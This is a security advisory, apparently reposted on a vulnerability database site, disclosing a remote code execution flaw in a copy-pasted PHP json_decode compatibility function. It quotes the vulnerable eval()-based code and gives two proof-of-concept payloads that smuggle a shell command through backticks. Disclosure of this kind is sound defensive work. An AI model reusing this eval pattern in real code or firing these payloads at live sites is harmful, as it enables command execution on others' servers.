Vulners
Lucene search
PHP Library Remote Code Execution
🗓️ 01 Jul 2022 00:00:00Reported by Eldar MarcussenType 
packetstorm🔗 packetstormsecurity.com👁 389 Views
`JAHx221 - RCE in copy/pasted PHP compat libraries, json_decode function
===============================================================================
Several PHP compatability libraries contain a potential remote code
execution
flaw in their `json_decode()` function based on having copy pasted existing
vulnerable code.
Identifiers
---------------------------------------
* JAHx221 - http://www.justanotherhacker.com/advisories/JAHx221.txt
Affected components
---------------------------------------
* WassUp Realtime analytics wordpress plugin/compat library -
https://wordpress.org/plugins/wassup/
* AjaXplorer Core -
https://pydio.com/en/community/releases/pydio-core/ajaxplorer-core-503-released
* FlexoCMS - https://github.com/flexocms/flexo1.source
* Various code -
https://github.com/search?p=6&q=if+function_exists+json_decode+eval+%24out&type=Code
* compat_functions.php - http://techfromhel.com
Description
---------------------------------------
This appears to date back to a compatability library published in 2010 and
appears in several code bases, with no, or a few variations.
The vulnerable code generally share the following characteristic:
* The json_decode function is declared if it does not exist
* some str_replace occurs to transform the json representation to PHP
* eval($out)
Since `eval()` is turing complete, it is generally considered unsafe to use
it
on user controlled or user influenced data, however it is unclear if
practical
exploitation would be possible due to the likely presence of an existing
json_decode function.
```php
/**
* compat_functions.php
* Description: Emulate some functions from PHP 5.2+ and Wordpress 2.6+ for
* backwards compatibility with PHP 4.3+ and Wordpress 2.2+, respectively
* @author: Helene D. <http://techfromhel.com>
* @version: 0.3 - 2010-09-13
* @since Wassup 1.8
*/
/**
* Convert simple JSON data into a PHP object (default) or associative
* array. Emulates 'json_decode' function from PHP 5.2+
* @author: Helene Duncker <http://techfromhel.com>
* @param string,boolean
* @return (array or object)
*/
if (!function_exists('json_decode')) {
function json_decode($json,$to_array=false) {
$x=false;
if (!empty($json) && strpos($json,'{"')!==false) {
$out =
'$x='.str_replace(array('{','":','}'),array('array(','"=>',')'),$json);
eval($out.';');
if (!$to_array) $x = (object) $x;
}
return $x;
} //end function json_decode
}
```
Proof of Concept
---------------------------------------
The eval can be exploited a number of ways, both via full or partial
control of the json string:
```php
/* Payload
`id`;//{"
*/
json_decode('`id`;//{"');
```
or partially controlled content:
```php
/* Payload
{"key":"value");echo `id`;//"}
*/
json_decode('{"key":"value");echo `id`;//"}');
```
Credit
---------------------------------------
Eldar "Wireghoul" Marcussen
Solution
---------------------------------------
Ensure json_decode is present as a native function for your PHP
installation.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2022 00:00Current
0.2Low risk
Vulners AI Score0.2